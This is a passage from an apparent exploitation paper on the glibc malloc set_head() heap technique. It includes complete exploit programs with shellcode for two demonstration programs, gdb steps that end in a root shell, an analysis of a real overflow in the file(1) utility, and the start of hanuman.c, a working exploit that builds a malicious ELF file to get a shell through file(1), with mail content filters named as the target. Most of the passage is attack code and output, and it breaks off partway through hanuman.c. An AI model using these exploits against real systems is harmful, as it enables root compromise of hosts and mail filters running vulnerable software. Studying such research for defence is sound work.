        malloc_size = shead->malloc_size;

        buffer = (char *) malloc (1036);
        memset (buffer, 0x90, 1036);
        put_longword (buffer+1028, topchunk_size);
        memcpy (buffer+1028-strlen(scode), scode, strlen (scode));
        buffer[1032]=0x0;

        snprintf (malloc_size_string, 20, "%u", malloc_size);
        execl ("./scenario1", "scenario1", buffer, malloc_size_string,
               NULL);

        return 0;
}

--[ end of exp1.c


Here are the steps to find the 3 memory values to use for this exploit.


1- The first step is to generate a core dump file from the vulnerable
program. You will then have to analyze this core dump to find the proper
values for your exploit.


To generate the core file, get an approximation of the top chunk location
by getting the base address of the BSS section. Normally, the heap will
start just after the BSS section:


bash$ readelf -S ./scenario1 | grep bss
  [22] .bss              NOBITS          080495e4 0005e4 000004


The BSS section starts at 0x080495e4. Let’s call the exploit the following
way, and remember to replace 0x080495e4 for the BSS value you have found:


bash$ ./exp1 0xc0c0c0c0 0x080495e4 0x080495e4
--[ Impossible to use 0x80495e4 as the top chunk location. Using 0x80495e0
instead
--[ Impossible to use 0xc0c0c0c0 as the return location. Using 0xc0c0c0c4
instead
--[ Impossible to use 0x80495e4 as the return address. Using 0x80495e1
instead
Segmentation fault (core dumped)
bash$


2- Call gdb on that core dump file. 


bash$ gdb -q scenario1 core.2212
Core was generated by `scenario1'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /usr/lib/debug/libc.so.6...done.
Loaded symbols for /usr/lib/debug/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
#0  _int_malloc (av=0x40140860, bytes=1075054688) at malloc.c:4082
4082        set_head(remainder, remainder_size | PREV_INUSE);
(gdb)

3- The ESI register contains the address of the top chunk. It might be 
another register for you. 


(gdb) info reg esi
esi            0x8049a38        134519352
(gdb)


4- Start searching before the location of the top chunk to find the NOP
cushion. This will be the return address.

0x8049970: 0x90909090 0x90909090 0x90909090 0x90909090 
0x8049980: 0x90909090 0x90909090 0x90909090 0x90909090 
0x8049990: 0x90909090 0x90909090 0x90909090 0x90909090 
0x80499a0: 0x90909090 0x90909090 0x90909090 0x90909090 
0x80499b0: 0x90909090 0x90909090 0x90909090 0x90909090 
0x80499c0: 0x90909090 0x90909090 0x90909090 0x90909090 
0x80499d0: 0x90909090 0x90909090 0x90909090 0x90909090 
0x80499e0: 0x90909090 0x90909090 0x90909090 0xe983c931 
0x80499f0: 0xd9eed9f5 0x5bf42474 0x27137381 0x83b3c0e2
0x8049a00: 0xf4e2fceb 0x2a98e94d 0x9ea88475 0xdb276b44
(gdb) 

0x8049990 is a valid address. 


5- To get the return location for your exploit, get a saved EIP from a
stack frame.

(gdb) frame 2
#2  0x0804840a in main ()
(gdb) x $ebp+4
0xbffff52c:     0x4002980c
(gdb)

0xbffff52c is the return location.

6- You can now call the exploit with the values that you have found.


bash$ ./exp1 0xbffff52c 0x8049990 0x8049a38
--[ Using 0x8049a38 as the top chunk location.
--[ Using 0xbffff52c as the return location.
--[ Impossible to use 0x8049990 as the return address. Using 0x8049991
instead
sh-2.05b# exit
exit
bash$


--------[ 6.1.2.1 - Multiple overwrites


This scenario is an example of a situation where it could be possible to
leverage the set_head() technique to make it write multiple times in
memory. Applying this technique will help you improve the reliability of
the exploit. It will increase your chances of finding a valid return
location while you are exploiting the program.


--[ scenario2.c

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main (int argc, char *argv[]) {

        char *buffer1;
        char *buffer2;
        unsigned long size;

/* [1] */ buffer1 = (char *) malloc (4096);
/* [2] */ fgets (buffer1, 4200, stdin);

/* [3] */ do {
                size = 0;
                scanf ("%u", &size);
/* [4] */       buffer2 = (char *) malloc (size);

                /*
                 * Random code
                 */

/* [5] */       free (buffer2);

        } while (size != 0);

        return 0;
}

--[ end of scenario2.c


Here is a brief description of the important lines in this code:


[1]: A memory region of 4096 bytes is requested. The top chunk is split
     and the request is serviced.

[2]: A call to fgets is made. The destination buffer is not checked to see
     if it is large enough. The top chunk can then be overwritten here.

[3]: The program enters a loop. It reads from ’stdin’ until the number ’0’
     is entered.

[4]: A call to malloc is done with ’size’ as the parameter. The loop does
     not end until size equals ’0’. This gives the attacker the
     possibility of overwriting the memory multiple times.

[5]: The buffer needs to be freed at the end of the loop.


--------[ 6.1.2.2 - Exploit


--[ exp2.c

/*
 * Exploit for scenario2.c
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

// The following #define are from malloc.c and are used
// to compute the values for the malloc size and the top chunk size.
#define PREV_INUSE 0x1
#define SIZE_BITS 0x7 // PREV_INUSE|IS_MMAPPED|NON_MAIN_ARENA
#define SIZE_SZ (sizeof(size_t))
#define MALLOC_ALIGNMENT (2 * SIZE_SZ)
#define MALLOC_ALIGN_MASK (MALLOC_ALIGNMENT - 1)
#define MIN_CHUNK_SIZE 16
#define MINSIZE (unsigned long)(((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) \
                & ~MALLOC_ALIGN_MASK))
#define request2size(req) (((req) + SIZE_SZ + MALLOC_ALIGN_MASK \
  < MINSIZE) ? MINSIZE : ((req) + SIZE_SZ + MALLOC_ALIGN_MASK) \
  & ~MALLOC_ALIGN_MASK)


struct sethead { 
unsigned long topchunk_size; 
unsigned long malloc_size; 


}; 


/* linux_ia32_exec - CMD=/bin/id Size=68 Encoder=PexFnstenvSub 
http://metasploit.com */ 

unsigned char scode[] =
"\x33\xc9\x83\xe9\xf5\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x4f"
"\x3d\x1a\x3d\x83\xeb\xfc\xe2\xf4\x25\x36\x42\xa4\x1d\x5b\x72\x10"
"\x2c\xb4\xfd\x55\x60\x4e\x72\x3d\x27\x12\x78\x54\x21\xb4\xf9\x6f"
"\xa7\x35\x1a\x3d\x4f\x12\x78\x54\x21\x12\x73\x59\x4f\x6a\x49\xb4"
"\xae\xf0\x9a\x3d";


struct sethead * set_head_compute
(unsigned long retloc, unsigned long retadr, unsigned long toploc) {


unsigned long check_retloc, check_retadr; 
struct sethead *shead; 


shead = (struct sethead *) malloc (8); 
if (shead == NULL) { 
fprintf (stderr, 


"--[ Could not allocate memory for sethead structure\n"); 


exit (1); 
} 


if ( (toploc % 8) != 0 ) {
fprintf (stderr, 


"--[ Impossible to use 0x%x as the top chunk location.", 


toploc); 
toploc = toploc - (toploc % 8); 
fprintf (stderr, " Using 0x%x instead\n", toploc); 


} else
fprintf (stderr,
"--[ Using 0x%x as the top chunk location.\n", toploc);


// The minus 8 is to take care of the normalization
// of the malloc parameter
shead->malloc_size = (retloc - toploc - 8);


// By adding the 8, we are able to sometimes perfectly hit 
// the return address. To hit it perfectly, retadr must be a multiple 
// of 8 + 1 (for the PREV_INUSE flag). 
shead->topchunk_size = (retadr + shead->malloc_size + 8) | PREV_INUSE; 


if (shead->topchunk_size < shead->malloc_size) { 
fprintf (stderr, 
"--[ ERROR: topchunk size is less than malloc size.\n"); 
fprintf (stderr, "--[ Topchunk code will not be triggered\n"); 
exit (1); 


} 


check_retloc = (toploc + request2size (shead->malloc_size) + 4); 
if (check_retloc != retloc) { 
fprintf (stderr, 
"--[ Impossible to use 0x%x as the return location. ", retloc); 
fprintf (stderr, "Using 0x%x instead\n", check_retloc) ; 
} else 
fprintf (stderr, "--[ Using 0x%x as the return location.\n", 
retloc); 
check_retadr = ( (shead->topchunk_size & ~(SIZE_BITS) )
- request2size (shead->malloc_size)) | PREV_INUSE;
if (check_retadr != retadr) {
fprintf (stderr,
"--[ Impossible to use 0x%x as the return address.", retadr);


fprintf (stderr, " Using 0x%x instead\n", check_retadr) ; 
} else 
fprintf (stderr, "--[ Using 0x%x as the return address.\n", 
retadr); 


return shead;
}


void 

put_byte (char *ptr, unsigned char data) { 
*ptr = data; 

} 


void 
put_longword (char *ptr, unsigned long data) { 
put_byte (ptr, data); 
put_byte (ptr + 1, data >> 8); 
put_byte (ptr + 2, data >> 16); 
put_byte (ptr + 3, data >> 24); 
} 
int main (int argc, char *argv[]) { 


char *buffer; 

char malloc_size_buffer[20]; 

unsigned long retloc, retadr, toploc; 
unsigned long topchunk_size, malloc_size; 
struct sethead *shead; 

int i;


if ( argc != 4) {
printf ("wrong number of arguments, exiting...\n\n");
printf ("%s <retloc> <retadr> <toploc>\n\n", argv[0]);
return 1;
}


sscanf (argv[1], "0x%x", &retloc);
sscanf (argv[2], "0x%x", &retadr);
sscanf (argv[3], "0x%x", &toploc);


shead = set_head_compute (retloc, retadr, toploc); 
topchunk_size = shead->topchunk_size; 
free (shead); 


buffer = (char *) malloc (4108); 

memset (buffer, 0x90, 4108); 

put_longword (buffer+4100, topchunk_size);
memcpy (buffer+4100-strlen(scode), scode, strlen (scode));
buffer[4104]=0x0;


printf ("%s\n", buffer); 


for (i = 0; i < 300; i++) {
shead = set_head_compute (retloc, retadr, toploc);
topchunk_size = shead->topchunk_size;
malloc_size = shead->malloc_size;

printf ("%u\n", malloc_size);

retloc = retloc - 8;
retadr = retadr + 8;

free (shead);
}


return 0;
}


--[ end of exp2.c


Here are the steps to find the memory values to use for this exploit. 


1- The first step is to generate a core dump file from the vulnerable 
program. You will then have to analyze this core dump to find the proper 
values for your exploit. 


To generate the core file, get an approximation of the top chunk location 
by getting the base address of the BSS section. Normally, the heap will 
start just after the BSS section: 


bash$ readelf -S ./scenario2 | grep bss
  [22] .bss              NOBITS          0804964c 00064c 000008


The BSS section starts at 0x0804964c. Let’s call the exploit the following 
way, and remember to replace 0x0804964c for the BSS value you have found: 


bash$ ./exp2 0xc0c0c0c0 0x0804964c 0x0804964c | ./scenario2
--[ Impossible to use 0x804964c as the top chunk location. Using 0x8049648
instead
--[ Impossible to use 0xc0c0c0c0 as the return location. Using 0xc0c0c0c4
instead
--[ Impossible to use 0x804964c as the return address. Using 0x8049649
instead
--[ Impossible to use 0x804964c as the top chunk location. Using 0x8049648
instead
[...]
--[ Impossible to use 0xc0c0b768 as the return location. Using 0xc0c0b76c
instead
--[ Impossible to use 0x8049fa4 as the return address. Using 0x8049fa1
instead
Segmentation fault (core dumped)
bash#


2- Call gdb on that core dump file.


bash$ gdb -q scenario2 core.2698
Core was generated by `./scenario2'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /usr/lib/debug/libc.so.6...done.
Loaded symbols for /usr/lib/debug/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
#0  _int_malloc (av=0x40140860, bytes=1075054688) at malloc.c:4082
4082        set_head(remainder, remainder_size | PREV_INUSE);
(gdb)


3- The ESI register contains the address of the top chunk. It might be
another register for you.


(gdb) info reg esi
esi            0x804a6a8        134522536
(gdb)


4- For the return address, get a memory address at the beginning of the NOP
cushion:


0x8049654: 0x00000000 0x00000000 0x00000019 0x4013e698 
0x8049664: 0x4013e698 0x400898a0 0x4013d720 0x00000000 
0x8049674: 0x00000019 0x4013e6a0 0x4013e6a0 0x400899b0 
0x8049684: 0x4013d720 0x00000000 0x00000019 0x4013e6a8 
0x8049694: 0x4013e6a8 0x40089a80 0x4013d720 0x00000000 
0x80496a4: 0x00001009 0x90909090 0x90909090 0x90909090 
0x80496b4: 0x90909090 0x90909090 0x90909090 0x90909090 
0x80496c4: 0x90909090 0x90909090 0x90909090 0x90909090 
0x80496d4: 0x90909090 0x90909090 0x90909090 0x90909090 
0x80496b4 is a valid address. 


5- You can now call the exploit with the values that you have found. The 
return location will be Oxbffffffc, and it will decrement with each write. 
The shellcode in exp2.c executes /bin/id. 


bash$ ./exp2 0xbffffffc 0x80496b4 0x804a6a8 | ./scenario2
--[ Using 0x804a6a8 as the top chunk location.
--[ Using 0xbffffffc as the return location.
--[ Impossible to use 0x80496b4 as the return address. Using 0x80496b9
instead
[...]
--[ Using 0xbffff6a4 as the return location.
--[ Impossible to use 0x804a00c as the return address. Using 0x804a011
instead
uid=0(root) gid=0(root) groups=0(root)
bash$


----[ 6.2 - A real case scenario: file(1) utility 


The set_head technique was developed during the research of a security hole
in the UNIX file(1) utility. This utility is an automatic file content
type recognition tool found on many UNIX systems. The versions affected
are Ian Darwin’s version 4.00 to 4.19, maintained by Christos Zoulas. This
version is the standard version of file(1) for Linux, *BSD, and other
systems.


So much energy was put into the development of this exploit mainly because
the presence of a vulnerability in this utility represents a high security
risk for an SMTP content filter.


An SMTP content filter is a system that acts after the SMTP server receives 
email and applies various filtering policies defined by a network 
administrator. Once the scanning process is finished, the filter decides 
whether the message will be relayed or not. 


An SMTP content filter needs to be able to call different kinds of programs
on an incoming email:


   - Dearchivers;
   - Decoders;
   - Classifiers;
   - Antivirus;
   - and many more


The file(1) utility falls under the "classifiers" category. 


This attack vector gives a completely new meaning to vulnerabilities that
were classified as low risk.


The author of this paper is also the maintainer of PIRANA [7], an
exploitation framework that tests the security of an email content filter. 
By means of a vulnerability database, the content filter to be tested will 
be bombarded by various emails containing a malicious payload intended to 
compromise the computing platform. PIRANA’s goal is to test whether or not 
any vulnerability exists on the content filtering platform. 


----[ 6.2.1 - The hole


The security vulnerability is in the file_printf() function. This function
fills the content of the ’ms->o.buf’ buffer with the characteristics of the
inspected file. Once this is done, the buffer is printed on the screen,
showing what type of file was detected. Here is the vulnerable function:


--[ From file-4.19/src/funcs.c


01 protected int
02 file_printf(struct magic_set *ms, const char *fmt, ...)
03 {
04      va_list ap;
05      size_t len;
06      char *buf;
07
08      va_start(ap, fmt);
09      if ((len = vsnprintf(ms->o.ptr, ms->o.len, fmt, ap)) >= ms->o.len) {
10              va_end(ap);
11              if ((buf = realloc(ms->o.buf, len + 1024)) == NULL) {
12                      file_oomem(ms, len + 1024);
13                      return -1;
14              }
15              ms->o.ptr = buf + (ms->o.ptr - ms->o.buf);
16              ms->o.buf = buf;
17              ms->o.len = ms->o.size - (ms->o.ptr - ms->o.buf);
18              ms->o.size = len + 1024;
19
20              va_start(ap, fmt);
21              len = vsnprintf(ms->o.ptr, ms->o.len, fmt, ap);
22      }
23      ms->o.ptr += len;
24      ms->o.len -= len;
25      va_end(ap);
26      return 0;
27 }




At first sight, this function seems to take good care of not overflowing 
the ’ms->o.ptr’ buffer. A first copy is done at line 09. If the 
destination buffer, ’ms->o.buf’, is not big enough to receive the character 
string, the memory region is reallocated. 


The reallocation is done at line 11, but the new size is not computed 
properly. Indeed, the function assumes that the buffer should never be 
bigger than 1024 added to the current length of the processed string. 


The real problem is at line 21. The variable ’ms->o.len’ represents the
number of bytes left in ’ms->o.buf’. The variable ’len’, on the other
hand, represents the number of characters (not including the trailing
’\0’) which would have been written to the final string if enough space had
been available. In the event that the buffer to be printed would be larger
than ’ms->o.len’, ’len’ would contain a value greater than ’ms->o.len’.
Then, at line 24, ’len’ would get subtracted from ’ms->o.len’. ’ms->o.len’
could underflow below 0, and it would become a very big positive integer
because ’ms->o.len’ is of type ’size_t’. Subsequent vsnprintf() calls
would then receive a very big length parameter thus rendering any bound
checking capabilities useless.
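
The wrap-around described above can be reproduced in isolation. The
following is only a minimal sketch and not the file(1) code: struct outbuf,
append_unchecked(), append_checked() and underflow_demo() are hypothetical
names, and the buffer is tracked with an offset instead of a pointer so that
the sketch itself never writes out of bounds. The only behaviour relied upon
is the standard one: vsnprintf() returns the length that would have been
written had enough space been available.

```c
#include <assert.h>
#include <stdarg.h>
#include <stddef.h>
#include <stdio.h>

/* Hypothetical cursor over a fixed buffer; 'left' plays the role of
 * ms->o.len in the excerpt above. */
struct outbuf {
    char   buf[16];
    size_t used;   /* offset of the next write */
    size_t left;   /* bytes believed to remain */
};

/* Bookkeeping in the style of lines 21 to 24: the return value of
 * vsnprintf() is trusted even when the output was truncated. */
static void append_unchecked(struct outbuf *o, const char *fmt, ...)
{
    va_list ap;
    int n;

    va_start(ap, fmt);
    n = vsnprintf(o->buf + o->used, o->left, fmt, ap);
    va_end(ap);
    if (n < 0)
        return;
    o->used += (size_t)n;
    o->left -= (size_t)n;      /* wraps around when n > left */
}

/* Defensive variant: only account for what was actually stored. */
static void append_checked(struct outbuf *o, const char *fmt, ...)
{
    va_list ap;
    int n;
    size_t stored;

    va_start(ap, fmt);
    n = vsnprintf(o->buf + o->used, o->left, fmt, ap);
    va_end(ap);
    if (n < 0 || o->left == 0)
        return;
    stored = ((size_t)n < o->left) ? (size_t)n : o->left - 1;
    o->used += stored;
    o->left -= stored;
}

static void underflow_demo(void)
{
    const char *s = "0123456789012345678901234567890123456789"; /* 40 chars */
    struct outbuf a = { {0}, 0, 16 };
    struct outbuf b = { {0}, 0, 16 };

    append_unchecked(&a, "%s", s);
    assert(a.left == (size_t)16 - (size_t)40);  /* huge positive value */
    assert(a.left > sizeof a.buf);

    append_checked(&b, "%s", s);
    assert(b.used == 15 && b.left == 1);        /* 15 chars + NUL stored */
}
```

After a single truncated write, the unchecked variant believes that almost
the whole address space is available, which is the state that the later
vsnprintf() calls in file_printf() inherit.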


----[ 6.2.2 - All the pieces fall into place


There is an interesting portion of code in the function donote()/readelf.c.
There is a call to the vulnerable function, file_printf(), with a
user-supplied buffer. By taking advantage of this code, it will be a lot
simpler to write a successful exploit. Indeed, it will be possible to
overwrite the chunk information with arbitrary values.


--[ From file-4.19/src/readelf.c 


        /*
         * Extract the program name.  It is at
         * offset 0x7c, and is up to 32-bytes,
         * including the terminating NUL.
         */
        if (file_printf(ms, ", from '%.31s'",
            &nbuf[doff + 0x7c]) == -1)
                return size;


After a couple of tries overflowing the header of the next chunk, it was 
clear that the only thing that was overflowable was the wilderness chunk. 
It was not possible to provoke a situation where a chunk that was not 
adjacent to the top chunk could be overflowable with user controllable 
data. 


The file utility has suffered from this buffer overflow since the 4.00
release, when the first version of file_printf() was introduced. A
successful exploitation was only possible starting from version 4.16.
Indeed, this version included a call to malloc with a user controllable
variable. From readelf.c:


--[ From file-4.19/src/readelf.c 


        if ((nbuf = malloc((size_t)xsh_size)) == NULL) {
                file_error(ms, errno, "Cannot allocate memory"
                    " for note");
                return -1;


This was the missing piece of the puzzle. Now, every condition is met to 
use the set_head() technique. 


----[ 6.2.3 - hanuman.c


/*
 * hanuman.c
 *
 * file(1) exploit for version 4.16 to 4.19.
 * Coded by Jean-Sebastien Guay-Leroux
 * http://www.guay-leroux.com
 *
 */

/*


Here are the steps to find the 3 memory values to use for the file(1) 
exploit. 


1- The first step is to generate a core dump file from file(1). You will 
then have to analyze this core dump to find the proper values for your 
exploit. 


To generate the core file, get an approximation of the top chunk location 
by getting the base address of the BSS section: 


bash# readelf -S /usr/bin/file

Section Headers:
  [Nr] Name              Type            Addr
  [ 0]                   NULL            00000000
  [ 1] .interp           PROGBITS        080480f4
  [...]
  [22] .bss              NOBITS          0804b1e0


The BSS section starts at 0x0804b1e0.  Let’s call the exploit the following
way, and remember to replace 0x0804b1e0 for the BSS value you have found:


bash# ./hanuman 0xc0c0c0c0 0x0804b1e0 0x0804b1e0 mal
--[ Using 0x804b1e0 as the top chunk location.
--[ Impossible to use 0xc0c0c0c0 as the return location. Using 0xc0c0c0c4
    instead
--[ Impossible to use 0x804b1e0 as the return address. Using 0x804b1e1
    instead
--[ The file has been written
bash# file mal
Segmentation fault (core dumped)


2- Call gdb on that core dump file. 


bash# gdb -q file core.14854
Core was generated by `file mal'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /usr/local/lib/libmagic.so.1...done.
Loaded symbols for /usr/local/lib/libmagic.so.1
Reading symbols from /lib/i686/libc.so.6...done.
Loaded symbols for /lib/i686/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
Reading symbols from /usr/lib/gconv/ISO8859-1.so...done.
Loaded symbols for /usr/lib/gconv/ISO8859-1.so
#0  0x400a3d15 in mallopt () from /lib/i686/libc.so.6
(gdb)


3- The EAX register contains the address of the top chunk. It might be 
another register for you. 


(gdb) info reg eax
eax            0x80614f8        134616312
(gdb)


4- Start searching from the location of the top chunk to find the NOP
cushion.  This will be the return address.

0x80614f8:      0xc0c0c0c1      0xb8bc0ee1      0xc0c0c0c1      0xc0c0c0c1
0x8061508:      0xc0c0c0c1      0xc0c0c0c1      0x73282027      0x616e6769
0x8061518:      0x2930206c      0x90909000      0x90909090      0x90909090
0x8061528:      0x90909090      0x90909090      0x90909090      0x90909090
0x8061538:      0x90909090      0x90909090      0x90909090      0x90909090
0x8061548:      0x90909090      0x90909090      0x90909090      0x90909090
0x8061558:      0x90909090      0x90909090      0x90909090      0x90909090
0x8061568:      0x90909090      0x90909090      0x90909090      0x90909090
0x8061578:      0x90909090      0x90909090      0x90909090      0x90909090
0x8061588:      0x90909090      0x90909090      0x90909090      0x90909090
0x8061598:      0x90909090      0x90909090      0x90909090      0x90909090
0x80615a8:      0x90909090      0x90909090      0x90909090      0x90909090
0x80615b8:      0x90909090      0x90909090
(gdb)

0x8061558 is a valid address.


5- To get the return location for your exploit, get a saved EIP from a
stack frame.


(gdb) frame 3
#3  0x4001f32e in file_tryelf (ms=0x804bc90, fd=3, buf=0x0, nbytes=8192)
    readelf.c:1007
1007        if (doshn(ms, class, swap, fd,
(gdb) x $ebp+4
0xbffff7fc:     0x400172b3
(gdb)


0xbffff7fc is the return location.


6- You can now call the exploit with the values that you have found. 


bash# ./new 0xbffff7fc 0x8061558 0x80614f8 mal
--[ Using 0x80614f8 as the top chunk location.
--[ Using 0xbffff7fc as the return location.
--[ Impossible to use 0x8061558 as the return address. Using 0x8061559
    instead
--[ The file has been written
bash# file mal
sh-2.05b


*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <stdint.h>


#define DEBUG                   0

#define initial_ELF_garbage     75
//ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically
// linked

#define initial_netbsd_garbage  22
//, NetBSD-style, from '

#define post_netbsd_garbage     12
//' (signal 0)


// The following #define are from malloc.c and are used
// to compute the values for the malloc size and the top chunk size.
#define PREV_INUSE              0x1
#define SIZE_BITS               0x7     // PREV_INUSE|IS_MMAPPED|NON_MAIN_ARENA
#define SIZE_SZ                 (sizeof(size_t))
#define MALLOC_ALIGNMENT        (2 * SIZE_SZ)
#define MALLOC_ALIGN_MASK       (MALLOC_ALIGNMENT - 1)
#define MIN_CHUNK_SIZE          16
#define MINSIZE (unsigned long)(((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) \
                        & ~MALLOC_ALIGN_MASK))
#define request2size(req) (((req) + SIZE_SZ + MALLOC_ALIGN_MASK \
                        < MINSIZE) ? MINSIZE : ((req) + SIZE_SZ + MALLOC_ALIGN_MASK) \
                        & ~MALLOC_ALIGN_MASK)


// Offsets of the note entries in the file
#define OFFSET_31_BYTES         2048
#define OFFSET_N_BYTES          2304
#define OFFSET_0_BYTES          2560
#define OFFSET_OVERWRITE        2816
#define OFFSET_SHELLCODE        4096


/* linux_ia32_exec -  CMD=/bin/sh Size=68 Encoder=PexFnstenvSub
http://metasploit.com */
unsigned char scode[] =
"\x31\xc9\x83\xe9\xf5\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x27"
"\xe2\xc0\xb3\x83\xeb\xfc\xe2\xf4\x4d\xe9\x98\x2a\x75\x84\xa8\x9e"
"\x44\x6b\x27\xdb\x08\x91\xa8\xb3\x4f\xcd\xa2\xda\x49\x6b\x23\xe1"
"\xcf\xea\xc0\xb3\x27\xcd\xa2\xda\x49\xcd\xb3\xdb\x27\xb5\x93\x3a"
"\xc6\x2f\x40\xb3";


struct math {
        int nnetbsd;
        int nname;
};


struct sethead {
        unsigned long topchunk_size;
        unsigned long malloc_size;
};


// To be a little more independent, we ripped
// the following ELF structures from elf.h
typedef struct
{
        unsigned char   e_ident[16];
        uint16_t        e_type;
        uint16_t        e_machine;
        uint32_t        e_version;
        uint32_t        e_entry;
        uint32_t        e_phoff;
        uint32_t        e_shoff;
        uint32_t        e_flags;
        uint16_t        e_ehsize;
        uint16_t        e_phentsize;
        uint16_t        e_phnum;
        uint16_t        e_shentsize;
        uint16_t        e_shnum;
        uint16_t        e_shstrndx;
} Elf32_Ehdr;


typedef struct
{
        uint32_t        sh_name;
        uint32_t        sh_type;
        uint32_t        sh_flags;
        uint32_t        sh_addr;
        uint32_t        sh_offset;
        uint32_t        sh_size;
        uint32_t        sh_link;
        uint32_t        sh_info;
        uint32_t        sh_addralign;
        uint32_t        sh_entsize;
} Elf32_Shdr;


typedef struct
{
        uint32_t        n_namesz;
        uint32_t        n_descsz;
        uint32_t        n_type;
} Elf32_Nhdr;


struct sethead * set_head_compute
(unsigned long retloc, unsigned long retadr, unsigned long toploc) {

        unsigned long check_retloc, check_retadr;
        struct sethead *shead;

        shead = (struct sethead *) malloc (8);
        if (shead == NULL) {
                fprintf (stderr,
                "--[ Could not allocate memory for sethead structure\n");
                exit (1);
        }

        if ( (toploc % 8) != 0) {
                fprintf (stderr,
                "--[ Impossible to use 0x%x as the top chunk location.",
                toploc);

                toploc = toploc - (toploc % 8);
                fprintf (stderr, " Using 0x%x instead\n", toploc);
        } else
                fprintf (stderr,
                "--[ Using 0x%x as the top chunk location.\n", toploc);

        // The minus 8 is to take care of the normalization
        // of the malloc parameter
        shead->malloc_size = (retloc - toploc - 8);

        // By adding the 8, we are able to sometimes perfectly hit
        // the return address.  To hit it perfectly, retadr must be a multiple
        // of 8 + 1 (for the PREV_INUSE flag).
        shead->topchunk_size = (retadr + shead->malloc_size + 8) | PREV_INUSE;

        if (shead->topchunk_size < shead->malloc_size) {
                fprintf (stderr,
                "--[ ERROR: topchunk size is less than malloc size.\n");
                fprintf (stderr,
                "--[ Topchunk code will not be triggered\n");
                exit (1);
        }

        check_retloc = (toploc + request2size (shead->malloc_size) + 4);
        if (check_retloc != retloc) {
                fprintf (stderr,
                "--[ Impossible to use 0x%x as the return location. ", retloc);
                fprintf (stderr, "Using 0x%x instead\n", check_retloc);
        } else
                fprintf (stderr, "--[ Using 0x%x as the return location.\n",
                retloc);

        check_retadr = ( (shead->topchunk_size & ~(SIZE_BITS))
                - request2size (shead->malloc_size)) | PREV_INUSE;
        if (check_retadr != retadr) {
                fprintf (stderr,
                "--[ Impossible to use 0x%x as the return address.", retadr);
                fprintf (stderr, " Using 0x%x instead\n", check_retadr);
        } else
                fprintf (stderr, "--[ Using 0x%x as the return address.\n",
                retadr);

        return shead;
}


/*
Not CPU friendly
*/
struct math *
compute (int offset) {

        int accumulator = 0;
        int i, j;
        struct math *math;

        math = (struct math *) malloc (8);

        if (math == NULL) {
                printf ("--[ Could not allocate memory for math structure\n");
                exit (1);
        }

        for (i = 1; i < 100;i++) {

                for (j = 0; j < (i * 31); j++) {

                        accumulator = 0;
                        accumulator += initial_ELF_garbage;
                        accumulator += (i * (initial_netbsd_garbage +
                                        post_netbsd_garbage));
                        accumulator += initial_netbsd_garbage;

                        accumulator += j;

                        if (accumulator == offset) {
                                math->nnetbsd = i;
                                math->nname = j;

                                return math;
                        }
                }
        }

        // Failed to find a value
        return 0;
}


void
put_byte (char *ptr, unsigned char data) {
        *ptr = data;
}


void
put_longword (char *ptr, unsigned long data) {
        put_byte (ptr, data);
        put_byte (ptr + 1, data >> 8);
        put_byte (ptr + 2, data >> 16);
        put_byte (ptr + 3, data >> 24);
}


FILE *
open_file (char *filename) {

        FILE *fp;

        fp = fopen ( filename , "w" );
        if (!fp) {
                perror ("Cant open file");
                exit (1);
        }

        return fp;
}


void
usage (char *progname) {

        printf ("\nTo use:\n");
        printf ("%s <return location> <return address> ", progname);
        printf ("<topchunk location> <output filename>\n\n");

        exit (1);
}

int
main (int argc, char *argv[]) {

        FILE *fp;
        Elf32_Ehdr *elfhdr;
        Elf32_Shdr *elfshdr;
        Elf32_Nhdr *elfnhdr;
        char *filename;
        char *buffer, *ptr;
        int i;
        struct math *math;
        struct sethead *shead;
        int left_bytes;
        unsigned long retloc, retadr, toploc;
        unsigned long topchunk_size, malloc_size;

        if ( argc != 5) {
                usage ( argv[0] );
        }

        sscanf (argv[1], "0x%x", &retloc);
        sscanf (argv[2], "0x%x", &retadr);
        sscanf (argv[3], "0x%x", &toploc);

        filename = (char *) malloc (256);
        if (filename == NULL) {
                printf ("--[ Cannot allocate memory for filename...\n");
                exit (1);
        }
        strncpy (filename, argv[4], 255);

        buffer = (char *) malloc (8192);
        if (buffer == NULL) {
                printf ("--[ Cannot allocate memory for file buffer\n");
                exit (1);
        }
        memset (buffer, 0, 8192);

        math = compute (1036);
        if (!math) {
                printf ("--[ Unable to compute a value\n");
                exit (1);
        }

        shead = set_head_compute (retloc, retadr, toploc);


        topchunk_size = shead->topchunk_size;
        malloc_size = shead->malloc_size;

        ptr = buffer;
        elfhdr = (Elf32_Ehdr *) ptr;

        // Fill our ELF header
        sprintf (elfhdr->e_ident, "\x7f\x45\x4c\x46\x01\x01\x01");
        elfhdr->e_type =                2;      // ET_EXEC
        elfhdr->e_machine =             3;      // EM_386
        elfhdr->e_version =             1;      // EV_CURRENT
        elfhdr->e_entry =               0;
        elfhdr->e_phoff =               0;
        elfhdr->e_shoff =               52;
        elfhdr->e_flags =               0;
        elfhdr->e_ehsize =              52;
        elfhdr->e_phentsize =           32;
        elfhdr->e_phnum =               0;
        elfhdr->e_shentsize =           40;
        elfhdr->e_shnum =               math->nnetbsd + 2;
        elfhdr->e_shstrndx =            0;

        ptr += elfhdr->e_ehsize;
        elfshdr = (Elf32_Shdr *) ptr;

        // This loop lets us eat an arbitrary number of bytes in ms->o.buf
        left_bytes = math->nname;
        for (i = 0; i < math->nnetbsd; i++) {
                elfshdr->sh_name        = 0;
                elfshdr->sh_type        = 7;    // SHT_NOTE
                elfshdr->sh_flags       = 0;
                elfshdr->sh_addr        = 0;
                elfshdr->sh_size        = 256;
                elfshdr->sh_link        = 0;
                elfshdr->sh_info        = 0;
                elfshdr->sh_addralign   = 0;
                elfshdr->sh_entsize     = 0;

